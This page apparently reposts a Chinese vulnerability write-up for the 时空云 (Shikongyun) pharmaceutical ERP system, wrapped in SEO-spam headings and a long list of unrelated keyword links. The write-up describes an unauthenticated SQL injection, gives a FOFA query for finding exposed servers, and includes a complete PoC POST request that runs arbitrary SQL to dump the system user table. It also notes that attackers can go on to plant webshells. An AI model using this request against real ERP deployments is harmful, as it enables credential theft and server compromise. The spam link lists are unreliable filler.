当前位置: 首页 > news >正文

免费安装app西安全网优化

免费安装app,西安全网优化,昆明手机网站开发,乌鲁木齐网0x01 产品简介 时空云社会化商业ERP(简称时空云ERP) ,该产品采用JAVA语言和Oracle数据库, 融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本…

0x01 产品简介

 时空云社会化商业ERP(简称时空云ERP) ,该产品采用JAVA语言和Oracle数据库, 融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本,最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标,是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。

0x02 漏洞概述

  时空云社会化商业ERP service接口处存在SQL注入漏洞,未授权的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息),甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:app="云时空社会化商业ERP系统"

0x04 漏洞复现 

PoC

POST /slogin/service?service=db.select HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Content-Length: 75params=%7B%22sql%22%3A%22select+%2A+from+sys_user+where+rownum+%3C+10%22%7D

查询系统用户表中所有列的9条数据

0x05 修复建议 

厂商已发布了漏洞修复程序,请及时关注更新:http://www.ysk360.com/

http://www.tj-hxxt.cn/news/43218.html

相关文章:

  • 福州网站制作怎样我想学做互联网怎么入手
  • 门户网站后台管理系统模板免费开店的电商平台
  • 推广策略是什么seo是什么意思知乎
  • 速成网站怎么做上海公布最新情况
  • 做PPT不错的网站有哪些百度搜索图片
  • 通化市建设工程招投标网站怎么注册网站
  • 做网站商城多少钱佛山seo外包平台
  • wordpress提交后不见了seo关键词的优化技巧
  • 政治建设网站seo工作前景如何
  • 太原网站建设公司网络推广网站程序
  • wordpress后台文章自定义字段面板百家号seo
  • 简单的个人网页制作北京seo公司助力网络营销
  • 东莞建筑建设网站建设微信软文案例
  • 建设网站费用入会计分录搜索引擎关键词优化技巧
  • 建立商务网站步骤软文素材网
  • 海口网站建设策划女装标题优化关键词
  • 晶鹰建设摩托车官网windows优化大师是哪个公司的
  • 中山建设网站品牌策划书
  • 河南工程新希望官网seo数据
  • 多语言网站制作网站推广策划
  • 上海网站建设平台站霸网络中文域名注册官网入口
  • Java电商网站开发百度云湖北seo关键词排名优化软件
  • 天猫旗舰店网站建设案例我在百度下的订单如何查询
  • 福州网站制作建设百度seo排名主要看啥
  • 个体工商户做营利性网站网店代运营可靠吗
  • 军事视频2020最新亚马逊seo什么意思
  • 国外 创意 网站厦门网络推广
  • 公司没有网站如何做外贸广州网站到首页排名
  • 苏州专业高端网站建设公司哪家好合肥网站制作公司
  • 网上做兼职的网站有哪些北京推广平台